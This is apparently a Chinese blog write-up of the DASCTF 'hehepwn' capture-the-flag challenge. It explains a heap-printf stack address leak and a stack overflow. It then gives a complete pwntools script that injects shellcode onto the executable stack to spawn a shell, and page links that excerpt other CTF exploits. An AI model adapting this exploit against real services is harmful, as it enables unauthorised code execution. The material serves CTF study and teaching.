DASCTF-hehepwn writeup

最新推荐文章于 2023-07-03 16:34:20 发布
最新推荐文章于 2023-07-03 16:34:20 发布
阅读量208 收藏
点赞数
分类专栏: ctf pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/One_p_Two_w/article/details/120524276
版权
ctf 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
pwn
3 篇文章 0 订阅
订阅专栏

DASCTF-hehepwn writeup

已上传网盘,方便复现

链接:https://pan.baidu.com/s/1ceYwALaUJn6TIS2eK9TN8w
提取码:ynzg

分析程序

没有开启任何保护,这里注意到开启了栈可执行,存在rwx字段,那么之后可以尝试在栈上执行ret2shellcode
请添加图片描述
使用ida分析程序

在这里可以看到存在堆上内容的泄露

strdup:strdup()会先用maolloc()配置与参数s 字符串相同的空间大小,然后将参数s 字符串的内容复制到该内存地址,然后把该地址返回。该地址最后可以利用free()来释放。

那么我们将read的0x20字全部填充,在没有字符串结尾的情况下,printf就会打印出堆块之后地址的内容
请添加图片描述
main函数中存在栈溢出,没有canary,可以直接覆盖返回地址

请添加图片描述

进行尝试

直到这里还并不知道该怎么攻击,不过既然有一个内存泄露,就先看看泄露出了什么

利用gdb进行调试

请添加图片描述
然后意外的发现,紧跟着我们申请的堆块后的被我们泄露出的地址是栈上的地址

继续跟踪发现是rbp的地址

那么既然泄露出了栈地址,又开启了栈可执行,我们就在栈上ret2shellcode了

exp

from pwn import *

context(log_level = 'debug', arch = 'amd64', os = 'linux')

io = process('./bypwn')
# io = remote('node4.buuoj.cn', 27761)
elf = ELF('./bypwn')
gdb.attach(io)

io.recvuntil(b'well you input:\n')
io.sendline(b'a' * (0x20 - 4) + b'bbbb')
io.recvuntil('bbbb')
#调试发现可泄漏地址为rbp
rbp = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(rbp))

stack = rbp - 0x50

io.recvuntil(b'EASY PWN PWN PWN~\n')

shellcode = asm(shellcraft.sh())
shellcode = shellcode.ljust(0x58, b'a')

payload = shellcode + p64(stack)

io.sendline(payload)

io.interactive()
长亭一梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF&BJDCTF 3rd 三道PWN题复现
weixin_44145820的博客
06-21 866
最近看了一下上次安恒五月赛没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3700
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 855
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 245
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF 2023六月挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 404
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
Prediction-Assignment-Writeup
03-18
9. **代码组织**: "Prediction-Assignment-Writeup-main"可能包含了一个结构化的代码目录,包括数据读取脚本、预处理函数、模型训练代码、结果评估和可视化代码等,体现了良好的编程实践。 10. **报告撰写**: 数据...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1311
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 290
此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 496
DASCTF 7月赋能赛pwn wp
MAR DASCTF明御攻防赛
Sakura给爷pwn全场
03-31 847
MAR DASCTF明御攻防赛 PWN、RE Writeup: https://www.anquanke.com/post/id/236178
DASCTF 2023六月挑战赛|二进制专项 pwn
m0_63437215的博客
07-03 444
DASCTF 2023六月挑战赛|二进制专项 pwn
Pwn基础知识笔记
3569
12-15 4589
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
pwn by example学习笔记(一)
沐沐的博客
05-15 1415
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1512
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
Dasctf 6月赛其余pwn WP
qq_31457355的博客
11-01 565
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值